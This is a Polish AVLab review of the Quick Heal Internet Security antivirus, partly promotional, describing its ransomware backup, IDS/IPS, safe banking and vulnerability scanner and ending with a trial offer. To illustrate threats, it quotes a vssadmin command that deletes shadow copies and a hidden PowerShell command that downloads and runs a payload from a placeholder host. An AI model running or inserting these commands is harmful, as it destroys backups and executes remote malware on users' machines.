Quick Heal Internet Security: nowy antywirus w Polsce z promocją dla czytelników AVLab

26 lutego, 2018
Quick Heal Internet Security

Zaczynamy nietypowo, bo od promocji, którą przygotowaliśmy z polskim dystrybutorem rozwiązań firmy Quick Heal: jeżeli profil firmy Quick Heal Technologies Ltd. nie jest Wam znany, drodzy Czytelnicy, to lepszej okazji do nadrobienia zaległości i zdobycia bezpłatnej ochrony na pakiet Quick Heal Internet Security w języku polskim nie będzie. Szczegóły znajdują się na końcu artykułu.

Jeszcze do niedawna w Polsce tylko nieliczni zapaleńcy i entuzjaści cokolwiek wiedzieli o firmie Quick Heal — dostawcy oprogramowania i sprzętu do ochrony sieci oraz stacji roboczych z Indii. Pod koniec 2016 roku za pośrednictwem dystrybutora ITD24 Sp. z o.o. do Polski trafiła marka biznesowych antywirusów Quick Heal Seqrite, a wraz z nią recenzowany poniżej Quick Heal Internet Security dla użytkowników indywidualnych i małych firm.

Przetłumaczony interfejs zawiera już informacje o wsparciu technicznym pełnionym na terenie naszego kraju:

Quick Heal Internet Security pomoc techniczna

Oprogramowanie marki Quick Heal posiada oficjalną dystrybucję w Polsce oraz wsparcie przed i po-sprzedażowe. I chociaż konkurencja jest bardzo mocna, to Hindusi — naród tak samo pracowity jak Polacy — nie przerazili się. Odległość 5300km, które na mapie w linii prostej dzielą nasze stolice, nie jest czymś, czego w XXI wieku nie dałoby się pokonać.  

Quick Heal to duża firma z tradycjami sięgającymi lat ’90. Obecnie zatrudnionych ponad 1300 osób, które zajmują się tworzeniem lub dostarczaniem kompleksowych usług, a także produktów bezpieczeństwa dla biznesu i odbiorców indywidualnych.

Quick Heal Internet Security interfejs

Firma Quick Heal została założona w 1995 roku. W tej chwili oprogramowanie tej marki liczy ponad 7.1 milionów aktywnych licencji w 80 krajach z całego świata. Około 1 mln stanowią licencje Quick Heal Total Security — produktu skierowanego do klientów indywidualnych oraz mikro firm. Metodyka liczenia zakłada, że licencja, która obejmuje ochroną np. 5 lub 1000 stanowisk traktowana jest jako jeden klient. Stąd faktyczna liczba chronionych użytkowników jest trudna do oszacowania

Pracownicy Quick Heal odnieśli międzynarodowy sukces, wykorzystując wszystkie poprzednie lata na pozyskanie 20 000 partnerów i założenie licznych oddziałów w 64 państwach. Bez dużego doświadczenia, pomysłów na rozwój i efektywnych technologii zabezpieczających, nie byłoby to możliwe. Rynek bardzo szybko weryfikuje wszelkie niedoskonałości, szczególnie w sektorze prywatnym, gdzie najwyższa jakość produktu i wysoki poziom świadczonych usług muszą być na pierwszym miejscu.

Quick Heal Technologies Ltd. działa nie tylko w branży komputerowej. Silne poczucie odpowiedzialności za lokalną społeczność wykreowało u dostawcy chęć niesienia pomocy, wspierania rozwoju edukacji oraz ochrony przed cyfrowymi zagrożeniami i skutkami wykorzystywania nowoczesnych technologii w negatywnych celach. Powołana w 2014 r. fundacja Quick Heal Foundation to prywatna inicjatywa zatrudniająca ponad 600 wolontariuszy. Fundacja pomaga m.in. niedoposażonym „placówkom medycznym i punktom sanitarnym” znacznie oddalonym od terenów zurbanizowanych.

Quick Heal Foundation

Quick Heal Internet Security dla Windows już od wersji 2000 i XP

Kiedy Microsoft zakończył wsparcie dla starszych systemów operacyjnych, zastępując je Windowsem 10, to na świecie w dalszym ciągu jest sporo takich firm i użytkowników, które nie śpieszą się z przesiadką na „dziesiątkę” — system stale aktualizowany i początkowo niedopracowany. Poniższe statystyki nie uwzględniają wersji biznesowych systemów operacyjnych WIndows:

Statystyki

Według podanych statystyk, w Polsce od stycznia 2017 roku do końca grudnia 2017 roku Windows XP ciągle miał swoich zwolenników. Chociaż kontratak widać tylko od strony Windows 10 (41.29%) i powoli tracących na znaczeniu Windows 7 (38.99%) i Windows 8.1 (11.7%), to Windows XP nadal ze skromnym udziałem 4.24% w rynku, zajmuje czwarte miejsce pod względem najpopularniejszego systemu operacyjnego na komputery stacjonarne i starsze laptopy. Z niższym wynikiem jest tylko Windows 8 (2.41%) i Windows Vista (1.33%).

Firmie Quick Heal nie za bardzo się śpieszy z porzuceniem wsparcia dla systemów (naj)starszych i jak na razie nie ma żadnej takiej oficjalnej informacji — skomentował Patryk Czubasiewicz, inżynier wsparcia technicznego ITD24, oficjalnego dystrybutora marki Quick Heal w Polsce.

Windows XP, Vista, 7, 8 i 8.1 razem stanowią spory kawał rynku. Dlatego dobrze, że ktoś pamięta o użytkownikach nie najnowszych systemów operacyjnych, którzy w równym stopniu wymagają bezkompromisowej ochrony przed szkodliwym oprogramowaniem.

Ataków ransomware jest mniej, ale złośliwego kodu JavaScript jest coraz więcej

Jedną z ważniejszych funkcji w oprogramowaniu antywirusowym jest zapobieganie i leczenie skutków po ataku ransomware. Jeżeli do pierwszego mechanizmu zaliczamy całokształt ochrony, to do drugiego najpewniejszym sposobem ochrony danych jest wykonywanie lokalnej (lub w chmurze) kopii zapasowej. Oczywiście ten wbudowany w antywirusy marki Quick Heal mechanizm backupu jest dodatkowo chroniony przed zaszyfrowaniem i usunięciem, a także – w przeciwieństwie do mechanizmu systemowego – nie jest możliwe usunięcie kopii zapasowej poleceniem uruchamianym przez ransomware:

"C:WindowsSYsWOW64cmd.exe" /C "C:WindowsSysnativevssadmin.exe" Delete Shadows /All /Quiet

Liczba wariantów i ilości próbek ransomware’u nie jest już tak duża jak kiedyś:

Ransomware statystyki

Od kilku miesięcy nie słyszeliśmy o dużym i spektakularnym ataku wykorzystującym nową lukę w systemie operacyjnym. Jednak ze względu na szkodę, jaką wyrządzają, wirusy szyfrujące w dalszym ciągu stanowią poważne zagrożenie.

Każde oprogramowanie antywirusowe marki Quick Heal w kilku krokach aktywnie chroni przed malware, w tym przed ransomware:

  • Monitoruje pobierane pliki i komponenty, które mogłyby stać się potencjalnym atakiem (np. część wirusa może być dostarczona jako downloader lub trojan).
  • Analizuje w czasie rzeczywistym zachowanie pliku w systemie (DNAScan).
  • Tworzy kopię zapasową danych, która na wypadek niepowodzenia ochrony może zostać przywrócona do stanu sprzed zaszyfrowania. Taka kopia jest szyfrowana wewnętrznym algorytmem opracowanym przez Quick Heal, dzięki czemu dane są zabezpieczone przed dostępem procesów trzecich.

W rozwiązaniu Quick Heal Internet Security mamy do czynienia z wielowarstwowym zabezpieczeniem. Protekcja przed ransomware jest tylko jedną z kilku ważnych składowych całej ochrony. I jak przystało na bezkompromisową ochronę, Quick Heal radzi sobie z oprogramowaniem szpiegowskim, adware, keyloggerami, trojanami, spyware i innymi rodzinami malware’u.

Szkodniki ukryte w kodzie JavaScript

W ostatnich 2-3 miesiącach notujemy coraz więcej doniesień o wykrytych szkodnikach wydobywających kryptowalutę Monero. Cyberprzestępcy nie za bardzo skupiają się na walucie Bitcoin. Algorytm wydobywania Monero jest przeznaczony dla komputerów typu desktop, w przeciwieństwie do Bitcoina, który wymaga specjalistycznego sprzętu, takiego jak układy scalone specyficzne dla aplikacji (ASIC) lub wysokiej klasy procesory graficzne. Zatem łatwiej jest skupić się na tej kryptowalucie, która pozwoli na przeprowadzanie szerzej zakrojonych kampanii przynoszących stały, ale mniejszy dochód. Drugim powodem jest obietnica anonimowości transakcji Monero, które używa tak zwanych adresów stealthowych wraz z mieszaniem transakcji, co sprawia, że szczegółowa przejrzystość transakcji i portfela nie istnieje. Monero w przeciwieństwie do Bitcoina (który nie zapewnia 100% anonimowości, ponieważ posiadając adres portfela BTC da się prześledzić transakcje) gwarantuje prawdziwą, stuprocentową anonimowość.

Gwałtowny wzrost zainteresowaniem kryptowalutami doskonale widać w statystykach dostarczonych przez firmę ESET, gdzie szkodniki wykrywane przez antywirusy tej marki jako JS/CoinMiner, stanowią aż 33% wszystkich wykrytych zagrożeń w ostatnim miesiącu w Polsce:

Statystyki JavaScript miners

Przed złośliwym kodem JavaScript trudno jest się chronić bez odpowiednich narzędzi. Internauta może nawet nie wiedzieć, że jego komputer „kopie” kryptowalutę. Na takie „wirusy” można się natknąć, oglądając seriale i filmy w nieautoryzowanych serwisach. Ale nie tylko, bo przecież niedawno podobny złośliwy kod odkryto m.in. na zhackowanej stronie MobileBlackberry.com, w polskim serwisie informacyjnym Rzeczpospolita.pl, a także na stronie internetowej urzędu gminu Kołbaskowo. Takich przykładów jest bardzo dużo.

Przed JavaScript’owymi koparkami można się chronić instalując odpowiednie rozszerzenie do przeglądarki lub zabezpieczając komputer oprogramowaniem antywirusowym, ale takim, które zawiera moduł wykrywający zagrożenia już w przeglądarce.

Quick Heal blokowania JavaScript miners

Nie zapomnijcie o firewallu i systemie IDS/IPS

Jeżeli mielibyśmy wymienić składnik ochrony, który jest często pomijany i niedoceniany, ale pełni istotną funkcję w zabezpieczeniu, to jest nim firewall ze wbudowaną ochroną przed intruzami (IDS/IPS, z ang. Intrusive Detection System / Intrusive  Protection System).

Oprogramowanie Quick Heal Internet Security posiada podobny system IPS/IDS do ochrony przed intruzami, jak produkt sprzętowy Quick Heal Seqrite UTM Terminator, który jest przeznaczony dla biznesu. Funkcja blokowania nieautoryzowanych ataków przez moduł IDS/IPS w oprogramowaniu Quick Heal Internet Security jest domyślnie włączona:

Quich Heal Internet Security IPS

Dlaczego firewall ze wbudowanym modułem IPS/IDS jest taki ważny? To, że silnik antywirusowy zabezpiecza przed złośliwymi plikami, wie chyba każdy. Natomiast w zaawansowanych atakach, gdzie wykorzystuje się bardziej wyszukane sposoby niż socjotechnikę — są to głównie ataki na niezabezpieczone i niezaktualizowane protokoły (głównie SMB), przeglądarki i rozszerzenia do przeglądarek, firewall z modułami IPS/IDS odgrywa bardzo ważną rolę w zabezpieczeniu.

Dwukierunkowy firewall zawierający system wykrywania intruzów może wykryć ataki zatruwające tablice ARP, fałszywe zapytania PING, ataki modyfikujące wpisy DNS, ataki na luki na protokoły SMB, RPC, RDP i ataki skanujące porty. Osłania sieć domową przed złośliwym oprogramowaniem i zatrzymuje malware, zanim zainstaluje się w systemie, w tym zabezpiecza przed pobraniem niebezpiecznego pliku m.in. przez CMD.exe lub PowerShell.exe (procesy systemowe bardzo często wykorzystywane w kodzie szkodliwego oprogramowania).

Przykładowy złośliwy kod, który przez systemowy proces powershell.exe pobiera na komputer szkodnika:

powershell.exe -nop -w hidden -c $H=new-object net.webclient;$H.proxy=[Net.WebRequest]::GetSystemWebProxy();$H.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $H.downloadstring('hxxp://zainfekowany_zasob:8080/pobierz_payload');

W skutecznym zabezpieczeniu największą rolę do odegrania ma w dalszym ciągu użytkownik. Śledzenie tych wszystkich informacji o atakach i szkodliwym oprogramowaniu stanowi część pracy administratorów. Nie zawsze jest to coś, co przeciętny internauta chciałby robić. Z tego powodu oprogramowanie ochronne, ale takie wielofunkcyjne i wielopoziomowe, ciągle pozostaje najlepszą inwestycją.

Jeżeli interesuje Was, czy Quich Heal poradził sobie w ostatnich porównaniach przeprowadzonych przez AVLab, to musicie zapoznać się z testami ochrony: przed atakami drive-by downloadprzed wirusami „bezplikowymi”.

Internetowa bankowość i bezpieczna przeglądarka

Na przełomie stycznia i lutego 2017 roku poddaliśmy testom kilka antywirusowych produktów, które posiadają tak zwane moduły do zabezpieczenia internetowych e-płatności.

Celem tego testu było sprawdzenie skuteczności modułów ochronnych, które mają zapewniać tak zwane „bezpieczne przeglądarki”, przed atakami hackerów oraz kradzieżą danych w momencie wykonywania e-przelewów i przeglądania stron internetowych, których bezpieczeństwo potwierdzone jest certyfikatami SSL.

Przyznajemy, że wówczas antywirusy marki Quick Heal nie odgrywały w Polsce takiej roli jak obecnie. Producent, dowiedziawszy się o teście, skontaktował się z nami i zapewnił, że oprogramowanie Quick Heal Internet Security dobrze poradziłoby sobie w tym porównaniu.

Quick Heal Internet Security banking

W module „Bezpiecznej Bankowości” bardzo nam się spodobała ochrona przed podmianą adresów DNS, która jest dodatkowo wzmocniona protekcją lokalnego pliku HOSTS (plik ten wspomaga tłumaczenie przyjaznych użytkownikom nazw domenowych na adresy IP):

Wirtualne środowisko Bezpiecznej Bankowości z Quick Heal.

Niejednokrotnie zdarzały się przypadki, kiedy router o słabych zabezpieczeniach został „zhackowany” przez internetowy skrypt logujący się na domyślne poświadczenia administratora. Podmienione na routerze adresy DNS powodowały, że ruch internetowy z urządzeń w sieci lokalnej przechodził przez serwer napastnika — ten mógł odszyfrowywać komunikację SSL i czytać loginy, hasła, a także inne ważne dane oraz podmieniać strony bankowe lub portali społecznościowych. Zebrane w ten sposób dane mogłyby posłużyć do ataków na znajomych osoby zhackowanej.

Korzystanie z Bezpiecznej Bankowości w oprogramowaniu Quick Heal zapobiega takim atakom. Pomimo zmienionych adresów DNS na routerze, to statyczne wartości na hoście mają pierwszeństwo w ustanawianiu adresu IP serwera tłumaczącego adresy przyjazne człowiekowi na adresy IP stron internetowych.

W programie Quick Heal Internet Security znajdziemy jeszcze jedną funkcję zwiększającą bezpieczeństwo. To „przeglądarka”, która jest uruchamiana w piaskownicy (sandbox).

Quick Heal Sandbox

W tym scenariuszu przeglądarka domyślna, z której korzysta użytkownik, uruchamiana jest w wirtualnym środowisku wewnątrz systemu. Po odwiedzeniu zainfekowanej strony wirus ogranicza się do wirtualnej przestrzeni i nie jest w stanie wpłynąć na działanie systemu operacyjnego (pomijając scenariusz ucieczki złośliwego kodu z piaskownicy w wyniku luki bezpieczeństwa). Po zamknięciu programu wszystkie dokonane zmiany w tym środowisku zostaną usunięte i nie będą miały wpływu na działanie systemu. 

Jeszcze więcej modułów i narzędzi

W programie znajdziemy jeszcze więcej modułów, które na pewno znajdą swoich zwolenników. A są to:

Quick Heal dodatkowe narzędzia

  • Ochrona przed wiadomościami typu SPAM, która współpracuje z zainstalowanymi klientami pocztowymi. Wykrywa w przychodzących i wychodzących wiadomościach wirusy, złośliwe hiperłącza i nadawców podszywających się pod wiarygodne podmioty.
  • Skaner wykrywający niezaktualizowane oprogramowanie, które może być wykorzystane do ominięcia zabezpieczeń. Mechanizm potrafi wykrywać nieprawidłowości w ustawieniach systemu operacyjnego. Po zakończonej pracy wyświetlane są szczegółowe informacje o identyfikatorach podatności CVE, które powinny docenić osoby szczególnie zainteresowane bezpieczeństwem:

Quick Heal Internet Security problrmy

Oprogramowanie Quick Heal Internet Security szczegółowo wymienia wszystkie podatności:

Quick Heal skaner podatności

Przykładowy raport ze skanowania pod kątem luk w systemie i zainstalowanym oprogramowaniu:

Numer luki w zabezpieczeniach:
CVE-2017-3737

Nazwa luki w zabezpieczeniach:
Vulnerability in OpenSSL 1.0.2 before 1.0.2n (CVE-2017-3737)

Zagrożone produkty:
OpenSSL

Zagrożone platformy:
Microsoft Windows XP, Microsoft Windows Vista, Microsoft Windows 7,  Microsoft Windows 8, Microsoft Windows 8.1, Microsoft Windows 10, Microsoft Windows Server 2003, Microsoft Windows Server 2008, Microsoft Windows Server 2008 R2, Microsoft Windows Server 2012, Microsoft Windows Server 2012 R2, Microsoft Windows Server 2016

Źródło luki:
Plik: C:Program FilesMicrosoft OfficerootOffice16ODBC DriversSalesforcelibOpenSSL64.DllAssleay32.dll
Plik: C:Program FilesMicrosoft OfficerootOffice16ODBC DriversRedshiftlibOpenSSL64.DllAssleay32.dll
Plik: C:Program FilesVMwareVMware Toolsssleay32.dll
Plik: C:Program FilesVMwareVMware ToolsVMware VGAuthssleay32.dll

Możliwość nadużycia luki i konsekwencje:
Mechanizm nadużycia: Sieć
Złożoność nadużycia: Średni
Uwierzytelnienie nadużycia: Żaden
Wpływ na poufność: Częściowy
Wpływ na integralność: Żaden
Wpływ na dostępność: Żaden

Odniesienia:
BID: http://www.securityfocus.com/bid/102103
SECTRACK: http://www.securitytracker.com/id/1039978
FREEBSD: https://security.FreeBSD.org/advisories/FreeBSD-SA-17:12.openssl.asc
CONFIRM: https://security.netapp.com/advisory/ntap-20171208-0001/
DEBIAN: https://www.debian.org/security/2017/dsa-4065
CONFIRM: https://www.openssl.org/news/secadv/20171207.txt

Do pozostałych narzędzi zaliczamy:

  • Ochronę rodzicielską z kontrolą aplikacji.
  • Moduł przywracający ustawienia przeglądarki Internet Explorer, które zostały zmodyfikowane przez malware.
  • Moduł wykrywający i usuwający pliki tymczasowe oraz ślady aktywności internetowej.
  • Moduł do tworzenia dysku naprawczego.
  • Moduł do manualnej diagnostyki uruchomionych procesów (wyświetla szczegóły o każdym aktualnie uruchomionym procesie).

Quick Heal Internet Security, warto?

Przejdźmy jeszcze na chwilę do efektywności ochrony. Czytelnicy, oprócz przeprowadzonych przez AVLab testów [ 12 ], w których oprogramowanie Quick Heal zdobywało najwyższe wyróżnienie BEST+++, powinni zapoznać się z ocenami pozostałych portali IT i firm specjalizujących się w testach. I tak:

  • Od 2015 roku w testach AV-Comparatives oprogramowanie Quick Heal regularnie zdobywało wysokie wyróżnienia „Advanced” i „Advanced+”.
  • W testach VirusBulletin antywirusy marki Quick Heal regularnie zdobywają wyróżnienia VB100.

Quick Heal Internet Security (oraz wersja bardziej rozbudowana: Quick Heal Total Security) to wielowarstwowa aplikacja ochronna, spełniająca standardy wymagającego użytkownika. To także odpowiedź na szerokie spektrum szkodliwego oprogramowania i większości ataków, które opisujemy na łamach portalu AVLab. Klientów z Polski na pewno ucieszy fakt, że marka Quick Heal posiada oficjalną dystrybucję w naszym kraju oraz wsparcie techniczne, które jest pełnione przez certyfikowanych inżynierów. A gdyby pomoc techniczna w wyznaczonej strefie nie spełniła wysokich wymagań klienta, zawsze można skorzystać z czatu lub kontaktu mailowego bezpośrednio z producentem. W takim przypadku wsparcie oferowane jest w systemie „follow the sun”, czyli 24h na dobę, niezależnie od lokalizacji na świecie.

Dla poszerzenia wiedzy o produktach firmy Quick Heal polecamy opracowane pozostałe artykuły dotyczące producenta Quick Heal.

Specjalna promocja dla firm i odbiorców indywidualnych — 6 miesięcy GRATIS

Z okazji recenzji oprogramowania Quick Heal Internet Security nie mogło zabraknąć przygotowanej przez dystrybutora w Polsce specjalnej promocji dla czytelników AVLab. Tym razem nie jest to konkurs, ani też jednorazowa zniżka, ale trwająca do odwołania akcja:

Pobierając instalator z tego adresu URL: http://download.quickheal.com/builds/1700/trial/is/polish/QHIS.EXE każda firma i użytkownik indywidualny będą mogli korzystać z bezpłatnej i w pełni funkcjonalnej wersji oprogramowania Quick Heal Internet Security przez 6 miesięcy.

Czy ten artykuł był pomocny?

Oceniono: 0 razy

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
21 komentarzy
najstarszy
najnowszy oceniany
Inline Feedbacks
View all comments

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]